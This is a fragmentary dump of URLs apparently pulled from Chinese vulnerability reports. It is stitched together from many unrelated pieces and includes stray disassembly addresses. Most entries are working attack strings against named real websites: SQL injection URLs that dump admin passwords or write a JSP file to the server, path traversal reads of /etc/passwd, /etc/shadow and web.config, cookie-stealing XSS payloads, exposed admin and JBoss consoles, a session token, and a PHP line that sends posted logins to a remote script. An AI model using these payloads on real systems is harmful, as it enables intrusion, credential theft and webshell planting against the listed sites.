http://www.china-safety.org/system_dntb/uploadFile.aspx http://www.china-safety.org/system_dntb/Advanced.aspx,使用firebug即可修改允许上传类型,这里已经被人修改过,添加了aspx类型,所以可以直接上传大马。 http://www.2cto.com/Article/201304/206536.html cookie:UserType=0 http://www.china-safety.org/system_dntb/upload/con2.aspx http://www.china-safety.org/system_dntb/upload/con2.asp http://www.china-safety.org/system_dntb/upload/2013110125222650.aspx www.ejobmart.cn,大概有jboss控制台泄露、sqli、xss问题 http://www.ejobmart.cn/jmx-console/ http://www.ejobmart.cn/web-console/ www.ejobmart.cn/workguide.html?columnid=185 http://www.ejobmart.cn:80/enterpriseinfo.html?unitid=CF7217F846C8ABBAE04010AC14976315 http://gd.10086.cn/surveypage/upload.jsp http://apps.2012.qq.com/guess/list-tid--stat-4?sort=desc,if%28%281=1%29,1,%28select/**/1/**/from/**/INFORMATION_SCHEMA.TABLES%29%29%20asc http://apps.2012.qq.com/guess/list-tid--stat-4?sort=desc,if%28%281=2%29,1,%28select/**/1/**/from/**/INFORMATION_SCHEMA.TABLES%29%29%20asc www.mjceo.com http://218.77.176.133/broadband2/login.jsp http://app.gh.qq.com/ http://app.gh.qq.com/cgi-bin/v1/guild/cgi_set_guild_base.cgi?iGuildID=xxxx&type=2&gamearea=327,320,&rd=0.8207729268233043 http://app.gh.qq.com/cgi-bin/v1/guild/cgi_set_guild_base.cgi?iGuildID=xxx&type=2&gamearea=327,'%2b http://ketang.weibo.com/sort/price/list_1/98.html?keyWord= http://ketang.weibo.com/sort/price/list_1/98.html?keyWord=%27/**/and/**/%27%27=%27 http://www.zsb.pudong-edu.sh.cn/CenterWeb/czzs/Info.asp?id=1208 http://ba.72dns.com/checkyms.php这个地 http://ba.72dns.com/checkyms.php?c:\windows\system32\cmd.exe http://ba.72dns.com/checkyms.php?E:\webhost\ba.72dns.com_mfiaiead\www\include/config.inc.php http://www.xian3g.com/p/n.aspx?Id=2997&ColId=120&ModelId=1 http://www.xian3g.com/P/td.aspx?ProductId=67 http://bang.dangdang.com:80/mall/bestSeller/index.php http://bang.dangdang.com/ajax_proxy.php,就不截图了。 www.cdtrp.com),发现开放MySql3306端口。 http://url.cn/IWEUUc http://t.cn/zHcmIaJ http://t.sohu.com/twAction/insertTwitter http://album.zhenai.com/register/register.jsps http://setv.com.cn/xgdh/videoshow.asp?id=32 http://si.cnc.cn/rss2.jsp?cid=1 ftp://xx.com/upload/payload.html ftp://xx.com/upload/payload.html http://xx.com/upload/xss.html http://xx.com/upload/xss.html ftp://username:passworld@xx.com/upload/payload.html http://202.106.182.172/b.php rv:21.0 http://localhost/espcms_utf8_5.6.13.04.22_b/upload/index.php?ac=membermain&at=editinfo http://www.holley.cn/news_detail.php?cid=31&id=266 http://cache.sina.com.cn/admin/index.php http://qdev.sina.com.cn/admin/index.php http://www.7g8g.com/joy/admin/index.php http://weibo.cn/?gsid=4uKI41461Sgqnu7BbJ0lW5VSSe9 http://bbs1.sina.cn/dpool/bbs/profile.php?uid=1414150877&pm=mil-2-604059-viewthread&gsid=4uKI41461Sgqnu7BbJ0lW5VSSe9&PHPSESSID=c814a4c9250d6c0f106cc8b12195ab39 http://vip2.weibo.cn/member/pay?F=W_hyzx&gsid=4uKI41461Sgqnu7BbJ0lW5VSSe9 http://www.hnair.com/ http://www.mod.gov.cn/ www.yantai.gov.cn http://try.suning.com/ReportList.html?c=母婴 http://try.suning.com/reportlist/2.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/3.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/4.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/6.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/5.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/7.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/296.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/trylist.html?c=母婴 http://try.suning.com/history.html?c=母婴 https://124.205.79.78/ vpn.cnu.edu.cn/sub_ca.php https://IP/minica_down.php https://vpn.bit.edu.cn/ https://sslvpn.bjtu.edu.cn/ https://125.46.88.100/ https://219.80.0.19/p https://info.nai.edu.cn/ https://124.205.79.78/ https://210.82.53.201/ https://vpn.cnu.edu.cn/ https://vpn.mcut.edu.tw/ https://ac.whlib.gov.cn https://sslvpn.nhcue.edu.tw https://isms.ydu.edu.tw/ https://sslvpn.ydu.edu.tw/ https://vpn.cute.edu.tw https://sslvpn.ntue.edu.tw https://vpn.psi.com.tw https://maltimur.jksm.gov.my/ https://vpn.ccom.edu.cn https://vpn.dlmu.edu.cn https://vpn.wanfang.edu.cn https://vpn.genius.com.cn https://sslvpn.changhongit.com https://vpn.jnrd.com.cn https://sslvpn.kworld.com.tw https://www.oo586.com/ https://svpn.mbatec.com.tw https://sslvpn.szs.com.tw https://sslvpn.gzcatv.net https://e.nais.net.cn https://vpn.thcic.cn https://vpn.pku.edu.cn/ https://vpn.cau.edu.cn/ https://sh-vpn.o2micro.com https://bj-vpn.o2micro.com https://cd-vpn.o2micro.com https://218.26.21.194/ https://218.26.7.112/ https://220.178.250.102/ https://vpn.hnuu.edu.cn/ https://222.75.160.120/ https://60.191.18.54/ https://61.191.18.137/ https://218.22.51.114/ https://183.166.187.156/ https://oa.qzbsg.gov.cn https://www.smfgny.com https://cbj.1203.org https://58.54.252.40 https://218.24.94.244 https://219.141.234.54/ https://vpn.cdc.com.cn https://58.242.162.242/ https://116.236.137.18/ https://oa.qzbsg.gov.cn/ https://122.225.14.154/ https://60.191.18.54/ https://125.65.179.230/ https://www.scxjrz.com/ https://vpn.tgsh.ttct.edu.tw/ https://ssl.qztc.com/welcome.php https://oa.chnmuseum.cn/ https://218.62.26.250/ https://219.143.243.103/ http://127.0.0.1/espcms/adminsoft/index.php?archive=templatemain&action=templateedit&dir=../&filename=index.php&type=edit&freshid=0.41100375866517425&iframename=jerichotabiframe_0&iframeheightwindow=617&iframewidthwindow=1430 http://www.chinamil.com.cn/ http://www.hntax.gov.cn/hntax/admin/ewebeditor_hntax_10/admin/login.jsp http://live.sina.cn/dpool/sports/live/live.php?match_id=2013042901&autoref=stop&oid=sina&vt=4 http://115.com/zone/static/js/Wo/WO.js http://www.jiuxian.com/web.php?c=user&m=info&suc=1#tabs-2 t.cn/xxxxxx http://webgps.tjsjwd.com/ http://webgps.tjsjwd.com/ http://www.jiuxian.com/web.php?c=user&m=address&addr_id=484740 http://login.jingwei.com/resetPass?email=邮箱地址&vc=a05e9dd6-e64d-4a5a-9364-60499d78c9aa http://login.jingwei.com/resetPass?email=邮箱地址&vc=a05e9dd6-e64d-4a5a-9364-60499d78c9aa http://monitor.hbepb.gov.cn/EPS/tEpInfoReg/login_post_itemTypeId=88952634&loginName=88952634&loginPwd=88952634 http://research.gtja.net:8081/logon.action http://www.jiuxian.com/web.php?c=login&m=get_pwd http://www.xhqsjz.gov.cn/gkdh_list.aspx?mingcheng=ddd http://shop.zte.com.cn/main/mobile/shop_mobilemateriel.jsp?queryName=1 http://shop.zte.com.cn/welcome.com http://diaocha.www.edu.cn/diaocha/vote.php http://liuxuenote.eol.cn/admin/login.php site:zhihu.com inurl:php http://my.115.com/?ct=account&ac=update_user_info&form%5Buser_name%5D=xxxxxx http://www.baidu.com/s?wd=%22%3E%3Ciframe%20src=//www.0563.org.cn%3E&TN=baidulocal http://www.wrcb.com.cn/ http://vpn.zjs.com.cn:1000/cgi-bin/php-cgi/html/svpn.php http://220.231.41.220:1000/cgi-bin/php-cgi/html/svpn.php https://61.163.104.181:4430/cgi-bin/php-cgi/html/svpn.php http://sslvpn.cifi.com.cn:1000/cgi-bin/php-cgi/html/svpn.php http://60.216.53.122:1000/cgi-bin/php-cgi/html/svpn.php http://222.85.86.119:1000/cgi-bin/php-cgi/html/svpn.php http://218.29.139.76:1000//cgi-bin/php-cgi/html/svpn.php http://wooyun.org/bugs/wooyun-2010-017323 http://big5.tcl.com/DRP/ http://crm.tv.tcl.com/DRP/ http://www.hik-online.com,漏洞在于此总台目录过滤不严,泄露用户登陆地址,导致弱口令登陆。账号admin url:http://rs3.bbs.itc.cn/v201305291556/?q=/../../../../../../../../../../../../etc/passwd http://manage.club.sohu.com/muser/login http://www.cepca.org.cn http://www.cepca.org.cn/download/download.aspx?filepath=/cns/../web.config&filename=web.config http://dlzj.cec.org.cn http://dlzj.cec.org.cn/DownLoad.aspx?filePath=/web.config&fileName=web.config http://www.anquan.org/seccenter/appeal_verify/ http://uems.sysu.edu.cn/jwxt/ http://www.pengpengmall.com/data/repeat_user.php http://www.aegon-cnooc.com/ http://service.aegon-cnooc.com/AEGON_GIS/loginAction.do http://www.xmjj.gov.cn/xxfw/dwr/call/plaincall/YzAction.getValidate.dwr http://www.xmjj.gov.cn/xxfw/register.action http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/ http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/@@datadir,2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/'test',2,3,4,5/**/into/**/dumpfile/**/'d:/UFseeyon/OA/tomcat/webapps/yyoa/test.jsp'/**/from/**/mysql.user/**/limit/**/1%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc http://vip.youku.com/account/trade.html http://vip.youku.com/ajax/tradedetail.html?trade_id=3 http://openresearch.baidu.com/member/message_read.jspx?id=500&&box=1 monitor.cern.ac.cn/login.html‎ www.uipower.com http://www.uipower.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=test&q=../../phpsso_server/caches/configs/database.php http://www.uipower.com/phpsso_server/phpcms/libs/classes/model.class.php http://vckbase.com/accman.php/Public/login http://lefen.lenovo.com/index.php/pph/see/-26%20union%20select%201,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,3,load_file%280x2F6574632F706173737764%29,5,6,7,8,9,10,11,12,13,14 http://lri.cas.cn/dzz/mis3/article.jsp?type=9 http://lri.cas.cn/dzz/mis3/login.jsp http://shadu.baidu.com/feedback/add http://jwc.ccit.edu.cn/third/show_jxtg.asp?id=230 Google:intext:Genie intitle:Genie https://tpa-atm1.dyxnet.com http://3gw.asia http://3gw.asia/Template/1.asp http://e960.com/plus/search.php?keyword=as&typeArr[111%3D@`\ http://clab.e3861.com/admin/admin_user.asp http://clab.e3861.com/登陆,登陆之后可以查看到用户的敏感的信息 http://clab.e3861.com/说明.txt http://clab.e3861.com/admin/ http://kmfsy.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''= szyx.hnust.edu.cn/xg/ https://portal.hnust.edu.cn:8443/cas/login?service=http%3A%2F%2Fszyx.hnust.edu.cn%2Fxg%2Fapplication%2Fmain.jsp# http://211.67.208.69/kdjw/xscjcx.jsp?yzbh=1201010101 https://portal.hnust.edu.cn:8443/cas/mail/check.jsp http://119.10.114.223 http://119.10.114.148 http://www.whhome.gov.cn/sgo/egs/site/cga/project/projectNet-list.action http://218.94.1.82/biology/loginAction.action江苏省疫苗管理信息系统 http://www.cjdao.com/jrssfund/fundFrontAction.action http://www.theskinfoodus.com/Product/product_list.asp?cate=1%7C4 http://www.theskinfoodus.com/skinfood/tv.asp?movieid=120&page=1&SF_Part=&SF_KeyWord= http://theskinfoodus.com/news/news_view.asp?boardcd=100&PK_NUM= http://210.43.128.216:8080/UMC/Login!start.action http://www.test.kingdee.com/article/blog.action http://ip/EnjoyRMIS_Client/msg/webfm/fmNewMsgList2.aspx?Popup=true&PB=true&LoginUserno=工号 http://i.youku.com/u/friends/follow_325973?__rt=1&__ro= http://i.youku.com/u/friends/follow_UMTMwMzg5Mg==?__rt=1&__ro= PS:ID是湖南电视台 http://221.224.77.214:8081/wsdg_suzhou/ http://221.224.77.214:8081/wsdg_suzhou/ctsBusSearch.do?formname=ctsBusSearchForm rv:15.0 http://221.224.77.214:8081/wsdg_suzhou/ctsBusSearch.do?formname=ctsBusSearchForm http://124.227.190.155/Home/RegInput http://124.227.190.155/ http://124.227.190.155/ http://www.jghq.gov.cn/ http://www.jghq.gov.cn/download.jsp?fileName=../../../../etc/shadow http://www.hbipo.gov.cn/ http://2.zbsjzd.org.cn/ http://www.hbipo.gov.cn/download.jsp?fileName=../../../../etc/shadow http://2.zbsjzd.org.cn/download.jsp?fileName=../../../../etc/shadow http://cloud.xuntongnet.com/ http://www.chinatietong.com/news/comment.php3?id=13675 http://www.dl.cttln.com/index.php?c=default&a=content&p=1&ic_id=21&id=189 inurl:account.do?method=index http://localhost/serviceTransfer.do?method=transerService http://localhost/client/manage/account/user_manage.jsp http://localhost/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://localhost/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=%2F http://www.jiayuan.com/parties/2011/lechi/lechi_index.php http://scebm.bda.edu.cn/Qtbm!toList.action http://www.bjca.org.cn:8080/XTXUserWeb/readagreement2.action http://www.bjca.org.cn/x.php http://hr.foxconn.com/R_Society/JobInfor.aspx?job_id=J014460 http://www.mypengpeng.com” http://hbcainfo.miibeian.gov.cn/state/outPortal/loginPortal.action http://minisite.youku.com/408/showadd.php?pwd=K0eN6xShoWaDdcH0sH8r http://minisite.youku.com/408/excel.php http://wszw.hzs.mofcom.gov.cn/fecp/portalpubsys/jbhtmledit/dlg_insert_media.jsp http://www.appchina.com/market/berry/search.action?q=9i http://360zs.appchina.com/market-web/banana/soft_main.action http://m.appchina.com/market-web/cherry/soft_main.action http://dev.appchina.com/market/dev/index.action http://www.shuaji.net/plus/search.php?keyword=as&typeArr[%20uNion%20]=a javascript:void(0) http://www.shuaji.net//plus/search.php?keyword=as&typeArr[111%3D@`\ http://www.cuplfil.com/systemmanage/login.asp http://www.zset.gov.cn/content.php?news_id=22690 http://www.zset.gov.cn/content.php?news_id=22690 http://www.docin.com/touch/detail.do?id=231298242&isDoc=0 http://gdcnc.voole.com/movie.action?id=19024 Global:RequestCaptainLearnSkill http://yunying.htinns.com:38000 http://yunying.htinns.com:38000/IBX.php http://allyes.nie.163.com/main/adftrack?db=afanie&url=//www.wooyun.com http://bmj.hunan.gov.cn/newssearch.aspx?searchKey=1 http://www.jcjob.cn/xlbys.action http://www.66call.com/help_info.aspx?Id=14 http://sdn.kugou.com/link.aspx?id=3480&url=http://t.k618.cn/url/lz3 IP:202.70.2.55 http://v9.demo.phpcms.cn/index.php?m=attachment&c=attachments&a=swfupload_json&src='%20and%20 http://v9.demo.phpcms.cn/index.php?m=pay&c=spend_list http://qcwap.xjwxcs.com/see!init.action www.jiuxian.com,另一个登录m.jiuxian.com,分别下一个订单; www.jianxian.com下的用户订单; http://m.jiuxian.com/order/cancel/1798433 www.jianxiu.com域名下刷新用户订单页面,发现已经被成功取消; http://jiu.sohu.com/searchprice.php?q=%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://product.news.sohu.com/news/hooscargame/pt_main.php?photourl=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E http://zhuanti.club.it.sohu.com/back.php http://zhuanti.club.it.sohu.com/icons/ http://passport.zte.com.cn/editorial/ztecn/ch/author/check_user.aspx?user_name= http://mobilerma.zte.com.cn/rma/Portal/index.jsp?country= http://127.0.0.1/espcms/adminsoft/index.php?archive=management&action=syssetting&listfunction=syssetting&groupid=&iframeheightwindow=621&iframewidthwindow=1430 http://127.0.0.1/espcms/adminsoft/index.php?archive=advertmain&action=advertadd&atid=1&type=add&freshid=0.8400494705419987&iframename=jerichotabiframe_0&iframeheightwindow=621&iframewidthwindow=1245 com.renren.ntc.fm/shared_prefs/sharedpref_user_session_key.xml同样可导致用户信息泄露,全局可写的/data/data/com.renren.ntc.fm/shared_prefs/sharedpref_user_access_token.xml会导致拒绝服务攻击,其他应用可以写入此文件覆盖掉用户的token。其他可读写文件的影响就不再赘述。 com.renren.ntc.fm/shared_prefs/sharedpref_user_access_token.xml com.renren.ntc.fm/shared_prefs/sharedpref_user_session_key.xml http://pan.baidu.com/share/link?shareid=3699376066&uk=456103769 http://bbs.olyouxi.com/api/manyou/ecshop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF http://www.icinfo.com.cn/html/icbcHomepage.action text:300CEFF2 text:300CEFF2 text:300CEFF5 ds:FlushFileBuffers text:300CEFFB text:300CEFFE ds:DisconnectNamedPipe text:300CF004 text:300CF007 ds:CloseHandle text:300CF00D text:300CF010 text:300CF012 text:300CF015 text:300CF017 text:300CF019 text:300CF01B text:300CF020 text:300CF022 text:300CF022 text:300CF022 text:300CF022 text:300CF025 text:300CF02C text:300CF02C text:300CF02C http://www.gomesell.com/ http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php text:300CFA78 text:300CFA78 text:300CFA7B ds:FlushFileBuffers text:300CFA81 text:300CFA84 ds:DisconnectNamedPipe text:300CFA8A text:300CFA8D ds:CloseHandle text:300CFA93 text:300CFA96 text:300CFA98 text:300CFA9B text:300CFA9D text:300CFA9F text:300CFAA1 text:300CFAA6 text:300CFAA8 text:300CFAA8 text:300CFAA8 text:300CFAA8 text:300CFAAB text:300CFAB2 http://www2.jxvtc.edu.cn:80/2009_rcpy.asp?id=54 http://safety.ceair.com:7500/sms/sms/safty/employeereport/emReportHome.zul http://www0.ceair.com/muecard/pages/system/login/mainFrame.jsp http://jgp.ceair.com/JGP/Web/GYSWBJK/Login.aspx?F_DWID=1400 http://operation.ceair.com:9001/OperationQA/criterion.access.d http://union.ceair.com/web/resetpassword.aspx?loginuser=610323198808081693 http://127.0.0.1/dede/install/index.php?insLockfile=1 http://newscms.house365.com/newCMS/login.php http://61.baidu.com/content.php?sid=391 http://www.anta.com.cn/en/home.php?option=4&Itemid=146015 http://www.anta.com.cn/en/home.php?option=4&Itemid=146015 http://www.chinatietong.com/news/comment.php3?id=13777 http://tvkuan.com/ background-image:expression http://pay.youku.com/ajax/verifytrade.html?tid=3 http://pay.youku.com/buy/result.html?r=s&tid=3&sign=e7974c0f8a51b225c88792736b501f3d http://edu.ata.net.cn/StudentsCenter/LoginInfoDetail.aspx?flog=question&id=16 http://zgsccp.org/info.asp?id=4891 http://zgsccp.org/info.asp?id=4891 http://zgsccp.org/info.asp?id=4891 http://zgsccp.org/info.asp?id=4891 http://zgsccp.org/info.asp?id=4891%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13%20from%20admin http://zgsccp.org/info.asp?id=4891%20union%20select%201,admin,3,password,5,6,7,8,9,10,11,12,13%20from%20admin http://oms.womaiapp.com/ http://www.soso.com/cs.q?w=xss http://www.globalpeople.com.cn/s/ckfinder/ckfinder.html?action=js http://tydjt.net/ggxx.asp?id=35 http://yts.yonyou.com/period/PeriodAction_index.do http://220.181.8.134 site:site:yesky.com http://admin.m.yesky.com/jsp/admin/login.jsp http://admin.m.yesky.com/ewebeditor/admin/ http://wap.91ac.com/ http://kfgd.icartoons.cn:8080/help.download?isAbsolute=false&path=WEB-INF/web.xml http://125.77.198.26:9002/channelaccount/login!toLogin.do http://125.77.198.26:9002/channelaccount/download.do?filename=WEB-INF/web.xml javascript:alert(document.cookie) javascript:alert(document.cookie) javascript:alert(document.cookie) http://www.gewara.com/home/sns/othersPersonIndex.xhtml?memberid=40949089 http://www.gewara.com/home/acct/updateFavorInfo.xhtml?tag=%3Cdiv%20onmouseover%3D%22javascript%3Aalert%28document.cookie%29%22%3ECCAV%E5%A4%A7%E5%AD%A6%3C%2Fdiv%3E javascript:window.locarion('上面构造的get请求') 3g.k.sohu.com/api/ mp.wap.sohu.com/api/ http://store.95516.net/p_detail.php?seqno=1224 http://www.hrbxzsp.gov.cn/right.jsp http://www.xacg.gov.cn/show.php?id=84&pid=13&cid=7 http://www.aqsj.gov.cn/include/web_content.php?id=2080 http://top.chinaz.com/list.aspx?t=35&baidu=1 http://demo.kaixindian.com/index.php/Yxpl?id=1 http://demo.kaixindian.com/index.php/Yxpl?id=1%20and%201=2%20union%20select%201,2,3,4,5,password,7%20from%20mysql.user http://home.400gb.com/mydisk.php?item=vip&action=pay&viptype=1 http://www.sxhbgz.com/web/window.php?id=94 www.snjgdj.gov.cn/admin/admin_index.asp http://im.e-oicc.com.cn/ www.ccb-life.com.cn www.aegon-cnooc.com http://111.75.198.122/ http://gpsst.lncom.gov.cn:88/LN_GPS/doif/myLogin.jsp http://gps.gpsisp.com/gps/doif/myLogin.jsp http://aud.yonyou.com/php/search.php?keyword=&page=19&tag=1&total_record=943&typeid=1 http://aud.yonyou.com/php/search.php?keyword=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28941058%29%3C%2fScRiPt%3E&page=1&tag=1&total_record=943&typeid=0 http://www.byr.edu.cn/shownews.php?id=884 http://www.ecshop.cn/respond.php?code=alipay&subject=00&out_trade_no=%000'%20and%20 http://www7.chinatelecom.com.cn/hr/pb/regi.do http://rs.hntelecom.net.cn/hr_external_system/viewRecruitNotice.do?notice_id=25 http://123.139.154.156/showphoneinfo/cardinssuerdetailshow.jsp这个页面未授权访问。 http://i.yinyuetai.com/wb/post/doPost.action?content=aa&picture=http%3A%2F%2Fi.yinyuetai.com%2Fwb%2Fpost%2FdoPost.action%3Fcontent%3Dc%26picture%3Dhttp%253A%252F%252Fi.yinyuetai.com%252Fwb%252Fpost%252FdoPost.action%253Fcontent%253Df%2526picture%253Dhttp%25253A%25252F%25252Fi.yinyuetai.com%25252Ffollow%25252Ffollow%25253Ffriendid%25253D20843262 http://wiki.squid-cache.org/Features/CustomErrors#ERR_.2A_template_codes_for_embedding http://sfocs.sf-express.com/im-client/imclient/selfHelp.action;jsessionid=717E73EB9EFE4CD0CA80F974FB68EA75?temp=1&loginCityId=212&loginProvinceId=7&source=cn&hl=zh_CN&goto2011=2011 http://game2.aiyonet.com/manage http://cms2.tiexue.net/ http://reg.sun0769.com/login.action site:url.mail.qq.com”就可以查看腾讯邮箱用户通过网页生成助手发出的邮件内容和发件人信息。 http://cn.bing.com/search?q=site%3aurl.mail.qq.com&go=&qs=n&pq=site%3aurl.mail.qq.com&sc=0-4&sp=-1&sk=&first=11&FORM=PORE http://124.127.168.242:8080/airport/assginCodeForMobile.do?phone=139xxxxxxxx&pagetag=CMCC http://www.kc.sc.sgcc.com.cn/ztgc/login.asp http://www.linktrust.com.cn/robots.txt http://linktrust.com.cn/data/skins/ http://www.linktrust.com.cn//images http://lohas.ehuatai.com/intro?code=4013 http://lohas.ehuatai.com/user/user_list http://lohas.ehuatai.com/user/user_list http://jlsbd.jl.sgcc.com.cn/Inc/ http://jlsbd.jl.sgcc.com.cn/databases/ http://orbs.baidu.com/jstp/34.jhtml http://squirrelmail.org/security/ http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/mime.php?r1=13276&r2=13338&view=patch http://test/?p= xlink:href插入javascript的问题 http://www.w3.org/2000/svg width:700px;height:400px;z-index:101;display:block;margin-top:-400px xmlns:xlink="http://www.w3.org/1999/xlink xlink:actuate="onClick xlink:href="javascript:console.log(/xss/) xlink:href含有javasctipt的漏洞 http://hqgl.hbcit.edu.cn/ http://candou.com http://so.candou.com/?wd= http://i.yinyuetai.com/wb/post/doDelete.action?id=xxxxx http://i.yinyuetai.com/wb/post/doDelete.action?id=16545628 http://i.yinyuetai.com/wb/post/doDelete.action?id=16462080 http://i.yinyuetai.com/1988428/feed/detail?id=16462080 http://city.china.com.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php http://www.xzhuang.com:80/?ucenter-info.html www.xzhuang.com rv:21.0 http://www.xzhuang.com/?member.html http://show.yule.sohu.com/viewUser.action?id=27 https://210.45.240.11/manage/ inurl:LoginPage.do?userType http://61.187.87.49/pms-hn/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://kjjh.lninfo.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://vote.stcn.com/yuqing/result.jsp?sid=5470&pid=120 http://dty.stcn.com/generalSubject.do?method=load_middle&tid=1489 http://mojie.sjq.cn/index.php?app=home&mod=Help&act=thread&id=62 http://pay.sjq.cn/admin http://subscribe.marieclairechina.com/websubscribe/mc_info.aspx?code=MC259&option=A http://cp.china-bluestar.com/transport/lxtransportapp!save.action http://www.158pe.com/admin.action http://www.tingmeineiyi.com.cn/Database/Data.asa http://www.tingmei.com/Database/Data.asa http://969966.net/sztw/shop/index.htm http://969966.net/sztw/shop/navigation!enterBusList.action?sign=bank&area=&bigType=%E9%87%91%E8%9E%8D%E6%9C%8D%E5%8A%A1&smallType=&keyword=&pager.pageNumber=9&pager.pageSize=50&pager.orderBy=id&pager.order=desc http://mail.qiyi.com/iwc_static/layout/login.html http://mail.qiyi.com/iwc_static/layout#login.html http://www.zgssxw.net/admin_manager/Admin_Managemain.asp http://www.zgssxw.net/databases/ http://www.zgssxw.net/images/ http://www.zgssxw.net/databases/ http://www.zgssxw.net/admin_manager/ http://www.zgssxw.net/image/ http://www.zgssxw.net/inc/ http://www.zgssxw.net/city/ http://www.zgssxw.net/css/ http://www.zgssxw.net/flash/ http://www.zgssxw.net/js/ http://www.zgssxw.net/jl/ http://www.zgssxw.net/jsq/ http://www.zgssxw.net/swf/ http://lifeweek.com.cn/iRelease/jsp/other/RegionView1.jsp?rid=1&issueid=624 http://v.huatu.com/htnews使用的是dedecms http://v.huatu.com/htnews/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35 http://www.ubsclub.com/DFN/member/Disclaimer!Save.action http://113.5.255.119:3380/inms_3.0/login.do http://wms.vipshop.com:8181/WebUI/UserLogin.aspx?i=1 http://www.sxkyzq.com/ http://183.60.7.30/system/gotoLogin.action http://183.60.7.30/manage/system.jsp?o=vLogin http://bug.9158.com/ http://bug.9158.com/web.rar很蛋疼的是源码直接就在根目录。。你在逗我吧。 http://www.ego-photo.com/show.php?id=5081 http://www.51ipa.com//plus/search.php?keyword=as&typeArr[111%3D@`\ http://3g.iqiyi.com/wap/pro/forward.jsp?forward_url=http://www.baidu.com跳转 http://3g.iqiyi.com//wap/pro/forward.jsp?c=&dirid=index&forward_url=..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2fetc%2fpasswd&linkid=285读取etc/passwd http://10.10.131.126:8087/wap/cms/index.jsp https://scm.qiyi.domain:18080/svn/mobilerep/server/wapsupport/212_wap/clien http://3g.iqiyi.com//wap/cache_admin.jsp?a=3&k=sbhelen http://3g.iqiyi.com/wap/pro/fdetail.jsp?c= http://3g.iqiyi.com/wap/cms/vte/vte.inc http://i.yinyuetai.com/wb/post/doPost.action http://vip.yupage.com/yyt.htm VERSION:1.2.2 www.dcel.nwpu.edu.cn www.lib.nwpu.edu.cn www.mba.nwpu.edu.cn www.nwpu.edu.cn www.dcel.nwpu.edu.cn www.lib.nwpu.edu.cn www.mba.nwpu.edu.cn www.nwpu.edu.cn http://218.21.78.40:7000/ http://218.21.78.40:7000/Foundation/easyUI/TabStrip/ShowTabStrip.aspx?TabKey=b02053ba-96ac-44cd-bcb1-6d4a2d4b6919&SkinPath=/Foundation/easyWork/Config/TabStrip.ascx http://218.21.78.40:7000/Foundation/easyUI/TabStrip/ShowTabStrip.aspx?TabKey=8d966efa-15c6-44bd-af3d-357c7e121eda&BusinessTreeId=A1000000-0000-0000-0000-000000000000&SkinPath=/Foundation/easyWork/Config/TabStrip1.ascx http://218.21.78.40:7000/foundation/easyinfo/treeFrame.aspx?TreeKey=CCF49EBC-81A5-4945-B8C0-D3961EC3FFB0 